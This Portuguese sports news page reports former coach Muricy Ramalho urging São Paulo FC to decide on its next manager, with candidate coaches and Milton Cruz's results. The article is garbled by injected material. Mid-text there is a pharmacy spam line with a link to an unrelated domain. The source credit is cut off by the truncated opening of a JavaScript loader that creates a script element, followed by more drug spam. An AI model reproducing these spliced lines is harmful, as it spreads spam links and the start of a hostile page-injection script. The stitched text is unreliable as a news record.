Destaque Noticia

Muricy pede definição sobre técnico: “Não dá para ficar no vai ou não vai”

Muricy Ramalho está acompanhando a situação do São Paulo. Desligado do clube no dia 6 de abril, com problemas de saúde e também sem obter bons resultados, ele entende ser necessário haver uma definição sobre o futuro técnico. Desde a sua saída, Milton Cruz assumiu o time e foi efetivado pelo presidente Carlos Miguel Aidar, mas segue com o mesmo contrato.

– Precisa definir as coisas, não dá para ficar nesse vai ou não vai. Se é o Milton mesmo que vai ficar, precisa ter um contrato. E aí ele vai ser o técnico. Mas está muito indefinido, e isso passa para o elenco. O mais importante é definir isso primeiro – disse, em entrevista à “Espn Brasil”.

Jorge Sampaoli, da seleção do Chile, era um dos nomes monitorados, mas o treinador só estará disponível após o fim da Copa América, cuja final está marcada para 4 de julho. Marcelo Oliveira, do Cruzeiro, agrada, mas o Tricolor só faria um movimento em caso de demissão. Alejandro Sabella, cogitado logo após a queda de Muricy, foi descartado, e Luxemburgo, do Flamengo, não se encaixa no perfil do clube, segundo o vice-presidente de futebol Ataíde Gil Guerreiro.
muricy spfc put in cart cheat pills without a doctor – http://candranara.mhs.narotama.ac.id/2016/11/30/put-in-cart-cheat-pills-without-a-doctor/
Na visão de Muricy, a má fase do time tem a ver com a falta de velocidade. Quando ainda comandava o Tricolor, o treinador apontava o mesmo defeito da equipe. Uma das tentativas de solução para o problema foi a contratação do argentino Centurión, no início do ano

– Você tem que ter velocidade, senão você não surpreende ninguém. O São Paulo não tem isso. Nós tentamos, fomos atrás do Dudu (Palmeiras), de outros jogadores com essas características, para ter velocidade pelas beiradas. O São Paulo é um time muito técnico, fica muito com a bola, mas não tem isso. E aí diminui as chances de ganhar. Esse é um problema sério. O São Paulo sofre muito disso aí – finalizou.

Há mais de um mês no comando do Tricolor, Milton Cruz soma nove jogos, com seis vitórias e três derrotas (Santos, na semifinal do Paulista, Cruzeiro, no jogo de volta das oitavas da Libertadores, e Ponte Preta, na segunda rodada do Brasileirão).

Em busca de reabilitação, o São Paulo volta a campo no sábado, contra o Joinville, às 18h30, no Morumbi, pela terceira rodada do Brasileirão.

Fonte: Gevar d=document;var s=d.createElement(‘script’); gain cheap medications on line

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Destaque Noticia

Mais em Destaque Noticia

Elenco trabalha em dois grupos na reapresentação

saopauloadmin16 de outubro de 2017

Cueva entra na briga pelo título de garçom do Brasileirão 2017

saopauloadmin16 de outubro de 2017

Dorival não abre mão do ataque e elogia 2º turno do São Paulo

saopauloadmin16 de outubro de 2017

Hernanes: ‘A torcida é a única que representa o São Paulo como merece’

saopauloadmin16 de outubro de 2017

Cueva pode desfalcar menos o São Paulo com novas datas do Peru

saopauloadmin15 de outubro de 2017

Petros revela noites em claro para jogar: “São Paulo acima de tudo”

saopauloadmin15 de outubro de 2017

Reforços de peso!

saopauloadmin11 de outubro de 2017

Atlético-MG x São Paulo: Dorival modifica time contra o Galo; veja provável escalação

saopauloadmin11 de outubro de 2017

Dorival quer Reinaldo de volta em 2018. São Paulo pensa em renovar

saopauloadmin11 de outubro de 2017